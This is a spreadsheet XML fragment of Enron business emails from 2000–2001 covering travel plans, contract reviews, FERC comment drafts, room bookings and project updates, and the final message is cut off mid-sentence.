    <t xml:space="preserve">Yea--it was outstanding news!  What a hoss.  Can't catch you this time but _x000D_
keep me posted on your next trip.  DF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark Schroeder@ECT_x000D_
01/14/2001 05:57 AM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Houston trip_x000D_
_x000D_
I am flying to Houston on Monday, am free for dinner, then leave Tuesday p.m. _x000D_
for Washington DC.  Leave word at the Downtwon Hyatt if you can join me.  _x000D_
Great news about Frank, wasn't it?   mcs_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 06:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Receipt of Team Selection Form - Executive Impact &amp; Influence_x000D_
 Program</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip K Allen/HOU/ECT on 08/31/2000 _x000D_
01:13 PM ---------------------------_x000D_
_x000D_
_x000D_
"Christi Smith" &lt;christi.smith@lrinet.com&gt; on 08/31/2000 10:32:49 AM_x000D_
Please respond to &lt;christi.smith@lrinet.com&gt;_x000D_
To: &lt;Phillip.K.Allen@enron.com&gt;_x000D_
cc: "Debbie Nowak (E-mail)" &lt;dnowak@enron.com&gt;, "Deborah Evans (E-mail)" _x000D_
&lt;debe@fsddatasvc.com&gt; _x000D_
Subject: Receipt of Team Selection Form - Executive Impact &amp; Influence Program_x000D_
_x000D_
_x000D_
Hi Phillip.  We appreciate your prompt attention and completing the Team_x000D_
Selection information._x000D_
_x000D_
Ideally, we needed to receive your team of raters on the Team Selection form_x000D_
we sent you.  The information needed is then easily transferred into the_x000D_
database directly from that Excel spreadsheet.  If you do not have the_x000D_
ability to complete that form, inserting what you listed below, we still_x000D_
require additional information._x000D_
_x000D_
We need each person's email address.  Without the email address, we cannot_x000D_
email them their internet link and ID to provide feedback for you, nor can_x000D_
we send them an automatic reminder via email.  It would also be good to have_x000D_
each person's phone number, in the event we need to reach them._x000D_
_x000D_
So, we do need to receive that complete TS Excel spreadsheet, or if you need_x000D_
to instead, provide the needed information via email._x000D_
_x000D_
Thank you for your assistance Phillip._x000D_
_x000D_
Christi L. Smith_x000D_
Project Manager for Client Services_x000D_
Keilty, Goldsmith &amp; Company_x000D_
858/450-2554_x000D_
_x000D_
-----Original Message-----_x000D_
From: Phillip K Allen [mailto:Phillip.K.Allen@enron.com]_x000D_
Sent: Thursday, August 31, 2000 12:03 PM_x000D_
To: debe@fsddatasvc.com_x000D_
Subject:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
John Lavorato-M_x000D_
_x000D_
Mike Grigsby-D_x000D_
Keith Holst-D_x000D_
Frank Ermis-D_x000D_
Steve South-D_x000D_
Janie Tholt-D_x000D_
_x000D_
Scott Neal-P_x000D_
Hunter Shively-P_x000D_
Tom Martin-P_x000D_
John Arnold-P_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 08:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'matt.dawson@enron.com'})</t>
  </si>
  <si>
    <t>Request Closed: Access Request for paul.maley@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 05/16/2001 03:51 PM -----_x000D_
_x000D_
	ARSystem &lt;ARSystem@mailman.enron.com&gt;_x000D_
	05/16/2001 03:44 PM_x000D_
		 _x000D_
		 To: "tana.jones@enron.com" &lt;tana.jones@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Request Closed: Access Request for paul.maley@enron.com_x000D_
_x000D_
_x000D_
The request has been completed with all resources requested either completed _x000D_
or rejected. You can view the details of the  request by clicking _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000034939&amp;Page=_x000D_
MyReq._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 06:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'shane.dobbs@fctg.com'})</t>
  </si>
  <si>
    <t>RE: what time tomorrow?</t>
  </si>
  <si>
    <t>sounds good.</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 07:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'oash@dom.com'})</t>
  </si>
  <si>
    <t>Contract 571492</t>
  </si>
  <si>
    <t>We have a FTGSS contract with a MDQ of 40,148 dts.  The primary receipt point _x000D_
on this contract is storage.  BUT, we can flow some of this gas from _x000D_
secondary points like Oakford or the Pools.  How much gas can be sourced from _x000D_
Secondary receipt points?</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 08:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'knowak@wpo.org'})</t>
  </si>
  <si>
    <t>WPO Mind/Body Health Seminar 2001</t>
  </si>
  <si>
    <t>WPO MIND/BODY HEALTH SEMINAR_x000D_
Tampa, Florida_x000D_
April 17 - 21, 2001_x000D_
_x000D_
This is your last chance to sign up for the WPO Mind/Body Health Seminar for_x000D_
2001! Due to the popularity of the event, we decided to increase our maximum_x000D_
attendance and we have just a few spaces left to fill._x000D_
_x000D_
Don't miss out on the opportunity to discuss health issues with some of the_x000D_
most influential practitioners in alternative medicine and whole body_x000D_
wellness! Get answers to some of today's hot topics such as the latest_x000D_
anti-aging techniques, news on vitamins and herbal supplements and new_x000D_
alternative healing methods on the market. You will also have the chance to_x000D_
receive personalized guidance through one-on-one sessions with our_x000D_
resources._x000D_
_x000D_
To register, just click on the attachment "Registration Form.doc" below,_x000D_
complete the form and fax_x000D_
_x000D_
to WPO with your credit card number for your deposit or mail it along with a_x000D_
check._x000D_
_x000D_
For more information on the Mind/Body Health Seminar, contact Kristi Nowak,_x000D_
WPO Event Manager, at knowak@wpo.org  or by phone at (703) 684-4933. We hope_x000D_
to see you there!_x000D_
_x000D_
(If you have already registered for this seminar, please disregard this_x000D_
email.)_x000D_
_x000D_
 &lt;&lt;registration form.doc&gt;&gt;_x000D_
------------------------------------_x000D_
Kristina M. Nowak_x000D_
Event Manager_x000D_
World Presidents' Organization_x000D_
ph. 703/684-4933_x000D_
fax 703/684-4955_x000D_
_x000D_
_x000D_
_x000D_
 - registration form.doc</t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 12:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'alan.comnes@enron.com', 'mary.hain@enron.com', 'linda.robertson@enron.com', 'james.steffes@enron.com', 'richard.shapiro@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'joe.hartsoe@enron.com', 'donna.fulton@enron.com'})</t>
  </si>
  <si>
    <t>IEP FERC/ISO: Draft IEP FERC Cmts on Staff Report</t>
  </si>
  <si>
    <t>FYI._x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 03/19/2001 08:30 PM -----_x000D_
_x000D_
	andy brown &lt;andybrwn@earthlink.net&gt;_x000D_
	03/19/2001 07:36 PM_x000D_
	Please respond to abb; Please respond to andybrwn_x000D_
		 _x000D_
		 To: Katie Kaplan &lt;kaplan@iepa.com&gt;_x000D_
		 cc: "'Alex Sugaoka (E-mail)'" &lt;alex.sugaoka@uaecorp.com&gt;, "'Bill Carlson _x000D_
(E-mail)'" &lt;william_carlson@wastemanagement.com&gt;, "'Bill Woods (E-mail)'" _x000D_
&lt;billw@calpine.com&gt;, "'Bob Ellery (E-mail)'" &lt;bellery@spi-ind.com&gt;, "'Bob _x000D_
Escalante (E-mail)'" &lt;rescalante@riobravo-gm.com&gt;, "'Bob Gates (E-mail)'" _x000D_
&lt;bob.gates@enron.com&gt;, "'Carolyn A Baker (E-mail)'" _x000D_
&lt;cabaker@duke-energy.com&gt;, "'Cody Carter (E-mail)'" _x000D_
&lt;cody.carter@williams.com&gt;, "'Curt Hatton (E-mail)'" _x000D_
&lt;Curt.Hatton@gen.pge.com&gt;, "'Curtis Kebler (E-mail)'" _x000D_
&lt;curtis_l_kebler@reliantenergy.com&gt;, "'David Parquet'" _x000D_
&lt;david.parquet@enron.com&gt;, "'Dean Gosselin (E-mail)'" _x000D_
&lt;dean_gosselin@fpl.com&gt;, "'Doug Fernley (E-mail)'" _x000D_
&lt;fernley.doug@epenergy.com&gt;, "'Douglas Kerner (E-mail)'" &lt;dkk@eslawfirm.com&gt;, _x000D_
"'Duane Nelsen (E-mail)'" &lt;dnelsen@gwfpower.com&gt;, "'Ed Tomeo (E-mail)'" _x000D_
&lt;ed.tomeo@uaecorp.com&gt;, "'Eileen Koch (E-mail)'" &lt;eileenk@calpine.com&gt;, _x000D_
"'Eric Eisenman (E-mail)'" &lt;eric.eisenman@gen.pge.com&gt;, "'Frank DeRosa _x000D_
(E-mail)'" &lt;frank.derosa@gen.pge.com&gt;, "Frazier Blaylock (E-mail)" _x000D_
&lt;frazier_blaylock@ogden-energy.com&gt;, "'Greg Blue (E-mail)'" _x000D_
&lt;gtbl@dynegy.com&gt;, "'Hap Boyd (E-mail)'" &lt;Hap_Boyd@enron.com&gt;, "'Hawks Jack _x000D_
(E-mail)'" &lt;jack.hawks@gen.pge.com&gt;, "'Jack Pigott (E-mail)'" _x000D_
&lt;jackp@calpine.com&gt;, "'Jim Willey (E-mail)'" &lt;elliottsa@earthlink.net&gt;, "'Joe _x000D_
Greco (E-mail)'" &lt;jgreco@caithnessenergy.com&gt;, "'Joe Ronan (E-mail)'" _x000D_
&lt;joer@calpine.com&gt;, "'John Stout (E-mail)'" &lt;john_h_stout@reliantenergy.com&gt;, _x000D_
"'Jonathan Weisgall (E-mail)'" &lt;jweisgall@aol.com&gt;, "'Kate Castillo _x000D_
(E-mail)'" &lt;CCastillo@riobravo-gm.com&gt;, "'Kelly Lloyd (E-mail)'" _x000D_
&lt;kellyl@enxco.com&gt;, "'Ken Hoffman (E-mail)'" &lt;khoffman@caithnessenergy.com&gt;, _x000D_
"'Kent Fickett (E-mail)'" &lt;kfickett@usgen.com&gt;, "'Kent Palmerton'" _x000D_
&lt;kent.palmerton@williams.com&gt;, "'Lynn Lednicky (E-mail)'" _x000D_
&lt;lynn.a.lednicky@dynegy.com&gt;, "'Marty McFadden (E-mail)'" _x000D_
&lt;marty_mcfadden@ogden-energy.com&gt;, "'Paula Soos'" _x000D_
&lt;paula_soos@ogden-energy.com&gt;, "'Randy Hickok (E-mail)'" _x000D_
&lt;rjhickok@duke-energy.com&gt;, "Rick S. Koebbe (E-mail)" _x000D_
&lt;rskoebbe@powerworksinc.com&gt;, "'Rob Lamkin (E-mail)'" _x000D_
&lt;rllamkin@seiworldwide.com&gt;, "'Roger Pelote (E-mail)'" _x000D_
&lt;roger.pelote@williams.com&gt;, "'Ross Ain (E-mail)'" &lt;ain@worldnet.att.net&gt;, _x000D_
"'Stephanie Newell (E-mail)'" &lt;stephanie-newell@reliantenergy.com&gt;, "'Steve _x000D_
Iliff'" &lt;siliff@riobravo-gm.com&gt;, "'Steve Ponder (E-mail)'" _x000D_
&lt;steve_ponder@fpl.com&gt;, "'Susan J Mara (E-mail)'" &lt;smara@enron.com&gt;, "'Tony _x000D_
Wetzel (E-mail)'" &lt;twetzel@thermoecotek.com&gt;, "'William Hall (E-mail)'" _x000D_
&lt;wfhall2@duke-energy.com&gt;, "'Alex Makler (E-mail)'" &lt;alexm@calpine.com&gt;, "Bob _x000D_
Szymanski (E-mail)" &lt;rjszymanski@powerworksinc.com&gt;, "'D. Frank (E-mail)'" _x000D_
&lt;dfrank@seawestwindpower.com&gt;, "'David Dickey (E-mail)'" _x000D_
&lt;david.dickey@calenergy.com&gt;, "'Doug Levitt (E-mail)'" &lt;SDL@calwind.com&gt;, _x000D_
"'Ed Maddox (E-mail)'" &lt;emaddox@seawestwindpower.com&gt;, "'Eric Edstrom'" _x000D_
&lt;edstrome@epenergy.com&gt;, "'Jeff Dasovich (E-mail)'" _x000D_
&lt;Jeff.Dasovich@enron.com&gt;, "'Julie Simon (E-mail)'" &lt;jsimon@epsa.org&gt;, _x000D_
"'Lucian Fox (E-mail)'" &lt;lucian_fox@ogden-energy.com&gt;, "'Mark J. Smith'" _x000D_
&lt;mark_J_smith@fpl.com&gt;, "'Milton Schultz (E-mail)'" &lt;bfpjv@c-zone.net&gt;, "'Nam _x000D_
Nguyen'" &lt;nam.nguyen@powersrc.com&gt;, "'Paul Wood (E-mail)'" _x000D_
&lt;paul_wood@ogden-energy.com&gt;, "'Pete Levitt (E-mail)'" &lt;Pete@calwind.com&gt;, _x000D_
"'Rich Dyer (E-mail)'" &lt;rich_dyer@ogden-energy.com&gt;, "'Robert Frees _x000D_
(E-mail)'" &lt;freesrj@apci.com&gt;, "'Scott Harlan'" &lt;harlans@epenergy.com&gt;, "'Ted _x000D_
Cortopassi (E-mail)'" &lt;ted_cortopassi@ogden-energy.com&gt;, "'Thomas Heller _x000D_
(E-mail)'" &lt;hellertj@apci.com&gt;, "'Tom Hartman'" &lt;tom_hartman@fpl.com&gt;, "'Ward _x000D_
Scobee (E-mail)'" &lt;wscobee@caithnessenergy.com&gt;, "Carol H Hudson (E-mail)" _x000D_
&lt;Chudson@iepa.com&gt;, "Steven Kelly (E-mail)" &lt;steven@iepa.com&gt;, "Andy Brown _x000D_
(E-mail)" &lt;ABB@eslawfirm.com&gt;, "Bob Weisenmiller (E-mail)" _x000D_
&lt;rbw@mrwassoc.com&gt;, "Jan Smutny-Jones (E-mail)" &lt;smutny@iepa.com&gt;, _x000D_
jmpa@dynegy.com, runwithmee@aol.com_x000D_
		 Subject: IEP FERC/ISO: Draft IEP FERC Cmts on Staff Report_x000D_
_x000D_
_x000D_
Attached in Word format are the draft IEP comments, due to be filed on the _x000D_
22nd, regarding the FERC Staff Report on market monitoring and market power _x000D_
mitigation.  This is my suggested approach, which is obviously subject to _x000D_
change per our discussion during the call tomorrow._x000D_
_x000D_
I would like to highlight that the draft characterizes the approach as a _x000D_
"circuit breaker" during periods of highest demand and suggests that this is _x000D_
distinct from notions of market power abuse.  Other entities are arguing that _x000D_
during the highest demand, when it exceeds available supplies, all suppliers _x000D_
have and are "exercising" (as distinct from abusing?) market power.  The _x000D_
draft attempts to highlight the current regional supply context characterized _x000D_
by the drought as a rationale for the "emergency circuit breaker."_x000D_
_x000D_
As mentioned in Katie Kaplan's email this morning, if your company has a _x000D_
draft of comments, we would appreciate an opportunity to look at them to _x000D_
avoid substantive conflicts._x000D_
_x000D_
I trust this is the right distribution list but I was not able to use the _x000D_
list from this morning's email because of computer problems at my end.  ABB_x000D_
_x000D_
--_x000D_
Andrew Brown_x000D_
Sacramento, CA_x000D_
abb@eslawfirm.com_x000D_
_x000D_
 - DRAFT_010318_el00-95-012_IEP_Cmts_Staff_Rpt.doc</t>
  </si>
  <si>
    <t>Mon, 17 Jul 2000 11:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bob.licato@enron.com'})</t>
  </si>
  <si>
    <t>RE: GE Turbine Purchase Contract - Linden 7 site</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry if I'm a little late in the day.  I feel into marathon meeting mode _x000D_
today._x000D_
_x000D_
Here are my observations of the GE contract.  I tried to confine it to _x000D_
significant issues since it appears to me that the negotiations are far along._x000D_
_x000D_
General Terms and Conditions_x000D_
I don't see where the buyer has much financial leverage for _x000D_
performance/warranty issues.  Final payment is made at shipment, with the _x000D_
Buyer having the benefit of a 10% retention bond; however, the retention bond _x000D_
expires at Provisional Acceptance.  There is no financial leverage for Final _x000D_
Acceptance or the warranty period.  Also, usually provisional or final _x000D_
acceptance requires that GE provide the operating manuals._x000D_
_x000D_
The assignment language (8) is somewhat narrow.  I don't know the deal, so I _x000D_
don't know how it fits. It can help to have language which allows for free _x000D_
assignment after provisional acceptance or payment in full, whichever occurs _x000D_
first.  Also, the contract can allow for a substitute guaranty as payment _x000D_
security, in lieu of the buyer guaranty.  Again, I don't know the deal so _x000D_
this may be fine as is._x000D_
_x000D_
The contract incorporates GE's proposal as a  part of the contract, but does _x000D_
not give an order of precedence.  I haven't seen the proposal or any other _x000D_
technical exhibits, but sometimes these can be very self-serving.  Therefore, _x000D_
you can potentially lose ground with what is in the exhibit._x000D_
_x000D_
Warranty.  The language is a bit confusing to me, especially the interplay of _x000D_
the 1st and 2nd paragraph.  Also, the "outs" they have are very broad.  It is _x000D_
better if there outs are limited to installation/operation/maintenance not in _x000D_
accoredance with their written instructions (alternatively, industry _x000D_
practice).  Also, they have an out if repairs are performed without their _x000D_
permission, but there's no time line or urgency for their response to a _x000D_
warranty claim.  A statement that they must provide a service engineer within _x000D_
3 days or so might help.  I also suggest being clear that 1.2 applies to _x000D_
warranty obligations, but their obligation to respond quickly to warranty _x000D_
problems need to be explicit._x000D_
_x000D_
Excusable Delay. (15) I would delete "indirectly" from the 3rd line._x000D_
_x000D_
Provisional Acceptance. I don't understand the phrase "only to the extent and _x000D_
proportional share".  Does this mean that GE may not be liable for the full _x000D_
LD's, or that the buyer has to prove  a right to collect LD's?_x000D_
_x000D_
Litigation. The dispute resolution (mediation then  litigation) is not _x000D_
consistent with the usual arbitration route we request._x000D_
_x000D_
I didn't take a hard look at LD's, since I assumed these are settled._x000D_
_x000D_
13.6 Enron typically gets more precise language than this.  For instance, I _x000D_
would delete or clarify the phrase "including that due to environment or _x000D_
operation", as being vague.  13.6 (i)The phrase "proper storage, _x000D_
installation, operation and maintenance" should be as defined by GE's written _x000D_
instructions, or at least based on industry standards. 13.6 (ii) could _x000D_
conceivably allow them to drag their feet on a repair, then not allow us to _x000D_
get someone else to do the work._x000D_
_x000D_
14.1  The last line should include the words "strict liability" after _x000D_
"negligence". GE ususally gives us indemnity for any hazardous substance they _x000D_
introduce._x000D_
_x000D_
This is a quick look.  If you need more detailed information (and you think _x000D_
there's time to negotiate further), I can look at it in more detail._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Bob Licato" &lt;Bob.Licato@enron.com&gt; on 07/12/2000 03:46:26 PM_x000D_
To: kay.mann@enron.com_x000D_
cc: "Lisa Mellencamp" &lt;Lisa.Mellencamp@enron.com&gt; _x000D_
_x000D_
Subject: RE: GE Turbine Purchase Contract - Linden 7 site_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Bob Licato/ECP/HOU/ECT on 07/12/2000 03:21_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Bob Licato_x000D_
07/12/2000 02:31 PM_x000D_
_x000D_
To:   Lisa Mellencamp/HOU/ECT@ECT, kaymann@enron.com_x000D_
cc:   Chuck Tobias/ECP/HOU/ECT, Cliff Evans/ECP/HOU/ECT_x000D_
Subject:  RE: GE Turbine Purchase Contract - Linden 7 site_x000D_
_x000D_
I spoke to Jon Stroble of El Paso today and he as agreed to delay signing this_x000D_
agreement until next week.   We need to get him any comments by close of_x000D_
business on Monday, July 17.    Can you please review and get me comments _x000D_
ASAP._x000D_
thanks and sorry for the short notice._x000D_
---------------------- Forwarded by Bob Licato/ECP/HOU/ECT on 07/12/2000 02:15_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
 (Embedded     Enron Capital &amp; Trade Resources Corp._x000D_
 image moved_x000D_
 to file:      From:  "Stroble, Jon"_x000D_
 pic17929.pcx) &lt;StrobleJ@EPEnergy.com&gt;_x000D_
               07/10/2000 11:58 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:   "'cgoode@ssd.com'" &lt;cgoode@ssd.com&gt;_x000D_
cc:   "Abramson, Shelly" &lt;AbramsonS@EPEnergy.com&gt;, "Kidd, Andrew"_x000D_
      &lt;KiddA@EPEnergy.com&gt;, "'chuck.tobias@enron.com'" _x000D_
&lt;chuck.tobias@enron.com&gt;,_x000D_
      "'bob.licato@enron.com'" &lt;bob.licato@enron.com&gt;_x000D_
Subject:  RE: GE Turbine Purchase Contract - Linden 7 site_x000D_
_x000D_
_x000D_
Cory,_x000D_
_x000D_
Please see comments in attached file.  I changed the date to July 14th_x000D_
assuming we can sign on this date._x000D_
_x000D_
 &lt;&lt;agree_6_13_00.doc&gt;&gt;    &lt;&lt;TsCs_6_28_00.doc&gt;&gt;      &lt;&lt;pricing_06_23_00.xls&gt;&gt;_x000D_
_x000D_
I'm hoping you can rewrite these files incorporating these comments as well_x000D_
as Shelly's comment below and Mike Neuman's comment from his 6/28 email_x000D_
copied below._x000D_
_x000D_
Parent Guarantee-We feel the dollar amount for the parent guarantee should_x000D_
be raised from $33Mill to $37mill to allow us some room in case of change_x000D_
orders.  In any event, the Contract Price is approximately $35mill._x000D_
_x000D_
Thanks,_x000D_
Jon_x000D_
_x000D_
          -----Original Message-----_x000D_
          From:     Abramson, Shelly_x000D_
          Sent:     Friday, July 07, 2000 4:58 PM_x000D_
          To:  'cgoode@ssd.com'; Kidd, Andrew; Stroble, Jon_x000D_
          Subject:  FW: GE Turbine Purchase Contract - Linden 7_x000D_
site_x000D_
_x000D_
          As per my previous e-mail._x000D_
_x000D_
          -----Original Message-----_x000D_
          From:     Abramson, Shelly_x000D_
          Sent:     Thursday, June 15, 2000 3:28 PM_x000D_
          To:  Stroble, Jon; Kidd, Andrew; 'cgoode@ssd.com'; Baker,_x000D_
Bob_x000D_
          Cc:  Brown, Stephen_x000D_
          Subject:  GE Turbine Purchase Contract - Linden 7 site_x000D_
_x000D_
          Jon and I met with East Coast Power this morning to discuss_x000D_
the contribution by El Paso of the GE Turbine for the Linden 7 Site.  The_x000D_
assignment clause in the GE Terms and Conditions currently permits the_x000D_
assignment by the buyer to an affiliate without GE's consent. The word_x000D_
affiliate is not defined but we should be able to take the position, as a_x000D_
49% equity owner in East Coast Power, that it is an El Paso affiliate.  I_x000D_
would recommend that to clarify, we include the following clause after the_x000D_
word affiliate in the Assignment Section: (including but not limited to East_x000D_
Coast Power L.L.C.).  Andrew, Bob and Coralyn, pls advise if you would like_x000D_
to take a different approach. I also expect that we will have a credit issue_x000D_
when the Contract is assigned to ECP as GE is now, I believe, getting an El_x000D_
Paso Energy Corp. Guaranty. According to Bob Licato at ECP, GE accepted an_x000D_
ECP assignment without an Enron guaranty on Linden 6 due in part to the_x000D_
presence of GECC as a lender/equity participant in ECP. We can discuss this_x000D_
with GE when we inform them of the planned assignment to ECP.  Finally, I_x000D_
would advise that when we get GE to sign a letter accepting the assignment,_x000D_
we confirm that the GE warranties flow to ECP.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_x000D_
_x000D_
(See attached file: agree_6_13_00.doc)_x000D_
(See attached file: TsCs_6_28_00.doc)_x000D_
(See attached file: pricing_06_23_00.xls)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - pic17929.pcx_x000D_
 - agree_6_13_00.doc_x000D_
 - TsCs_6_28_00.doc_x000D_
 - pricing_06_23_00.xls_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 03:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tom.barkley@enron.com'})</t>
  </si>
  <si>
    <t>EOL Project</t>
  </si>
  <si>
    <t>Vince,_x000D_
_x000D_
Just to update you on how things are going with regard to EOL -_x000D_
_x000D_
I had a meeting with John Arnold yesterday to show him what had been _x000D_
accomplished to date, and I think that he was fairly impressed by the _x000D_
information available. I asked him for his input, and he expressed his _x000D_
interest in having a couple of reports made up that couldn't be created from _x000D_
the format the data was in. I spoke to Clayton about this, and he has already _x000D_
made changes that will reflect a number of the modifications John requested._x000D_
_x000D_
I am also continuing to research the issue of an automated trading platform _x000D_
for EOL. I have some information about how the NASDAQ operates, and I have _x000D_
looked at some websites for ECNs, such as Archipelago, Island and Instinet. I _x000D_
have also had a look at the International Securities Exchange (ISE) web-site, _x000D_
but they do not seem to explain much about their system. Any further _x000D_
suggestions would be appreciated._x000D_
_x000D_
I want to find out more about where EOL is currently and what modifications _x000D_
may be necessary in the existing system, finish reading the material at the _x000D_
websites I have investigated, and then I will try to put together a _x000D_
presentation for you and/or Greg Whalley._x000D_
_x000D_
Tom</t>
  </si>
  <si>
    <t>Mon, 3 Dec 2001 06:54:34 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Cancelations for EB 42C1</t>
  </si>
  <si>
    <t>FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kenagy, Gary  _x000D_
Sent:	Monday, December 03, 2001 8:50 AM_x000D_
To:	Corman, Shelley_x000D_
Subject:	RE: Cancelations for EB 42C1_x000D_
_x000D_
yes._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Corman, Shelley  _x000D_
Sent:	Monday, December 03, 2001 8:22 AM_x000D_
To:	Kenagy, Gary_x000D_
Subject:	FW: Cancelations for EB 42C1_x000D_
Importance:	High_x000D_
_x000D_
Gary,_x000D_
_x000D_
Except for this week, it is my understanding that it will be okay for us to use 42C1 if the meeting includes solely gas logistics staff that had security access to gas control.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Winters, Ricki  _x000D_
Sent:	Monday, December 03, 2001 8:17 AM_x000D_
To:	Corman, Shelley_x000D_
Subject:	FW: Cancelations for EB 42C1_x000D_
Importance:	High_x000D_
_x000D_
The only place we can put all the food will be right outside your office.  I could have some tables put up there..._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Chris Nugent/NA/Enron@ECT   On Behalf Of Department, Audio_x000D_
Sent:	Monday, December 03, 2001 7:42 AM_x000D_
To:	Ashe, Alva; Fields, Erica; Etienne, Bernadette; Webb, Kay; Villarreal, Lillian; Winters, Ricki; Crenshaw, Shirley; Adams, Cindy_x000D_
Cc:	Kenagy, Gary; Anderson, Brenda_x000D_
Subject:	Cancelations for EB 42C1_x000D_
_x000D_
Good Morning,_x000D_
_x000D_
	I have been instructed to inform the people who have scheduled Conference Room 42C1 in the month of December, that we have to reschedule all meetings. Below are the meetings that have been scheduled and we will have to work together so that we can put everyone into a new room. _x000D_
_x000D_
Alva Ashe - 12/3, 12/10, 12/17, 12/24, 12/31_x000D_
Erica Fields - 12/3, 12/10_x000D_
Bernadette Etienne - 12/4, 12/6_x000D_
Cindy Adams - 12/4, 12/11, 12/18_x000D_
Kay Webb - 12/5, 12/19_x000D_
Lillian Villarreal - 12/6_x000D_
Shirley Crenshaw - 12/7_x000D_
Ricki Winters - 12/11_x000D_
_x000D_
Please give me a call so that we can reschedule you into a new room. If you are not needing the room after all and are wanting cancel please give us a call._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Lionel Pantoja_x000D_
Audio Visual Administrator_x000D_
(713)853-6300 option 2.</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 05:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Cliff,_x000D_
_x000D_
Thanks for lunch.  I always really enjoy getting together and talking about _x000D_
life and our businesses.  Attached are the two presentations we discussed.  A _x000D_
little airplane (or boat, sorry, ship) reading.  I would appreciate any _x000D_
feedback.  I'll be making significant changes as I get ready for the analyst _x000D_
meetings._x000D_
_x000D_
Thanks,_x000D_
Mike_x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 Feb 2000 09:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mam@teamlead.com'})</t>
  </si>
  <si>
    <t>Michael (or Mike..what do you like to be called?),_x000D_
_x000D_
My schedule is open Thursday afternoon 1-5pm and Friday 1-4pm.  Let me know _x000D_
the what works best for you.  Earlier in the afternoon is usually best for me._x000D_
_x000D_
Daren</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 04:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Burlington Resources</t>
  </si>
  <si>
    <t>FYI,   Burlington is still on the trading floor  for VP signature.   I just _x000D_
called and should get same this PM._x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 07:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: India Model</t>
  </si>
  <si>
    <t xml:space="preserve">Vince,_x000D_
I forwarded this to Sandeep so he could reply._x000D_
--Stinson_x000D_
_x000D_
---------------------- Forwarded by Stinson Gibner/HOU/ECT on 12/28/2000 _x000D_
03:04 PM ---------------------------_x000D_
_x000D_
_x000D_
"Robert Schenck" &lt;schenck@hesinet.com&gt; on 12/27/2000 11:21:18 PM_x000D_
To: &lt;Stinson.Gibner@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: India Model_x000D_
_x000D_
_x000D_
Stinson,_x000D_
_x000D_
I am trying to contact our data base experts at the moment to clarify some_x000D_
issues with the region and may need another day to get something more_x000D_
concrete in front of you._x000D_
_x000D_
What I would like to know is the extent of your company knowledge re the_x000D_
following_x000D_
_x000D_
Generation units' nameplate capacity, fuel type, efficiency, O&amp;M costs, fuel_x000D_
costs_x000D_
Location of generation units_x000D_
details of HV interconnectors between regions which have individual load_x000D_
forecasts (capacity in MW, losses)_x000D_
Details of Hydro/pump storage location, capacity and Historical outputs_x000D_
_x000D_
many thanks_x000D_
_x000D_
Robert_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Stinson.Gibner@enron.com [mailto:Stinson.Gibner@enron.com]_x000D_
&gt; Sent: Thursday, 28 December 2000 3:22 AM_x000D_
&gt; To: schenck@hesinet.com_x000D_
&gt; Cc: dbranchcomb@hesinet.com; Vince.J.Kaminski@enron.com_x000D_
&gt; Subject: India Model_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Robert,_x000D_
&gt;_x000D_
&gt; Enron would like to do a study of power prices and dispatch for_x000D_
&gt; India    We_x000D_
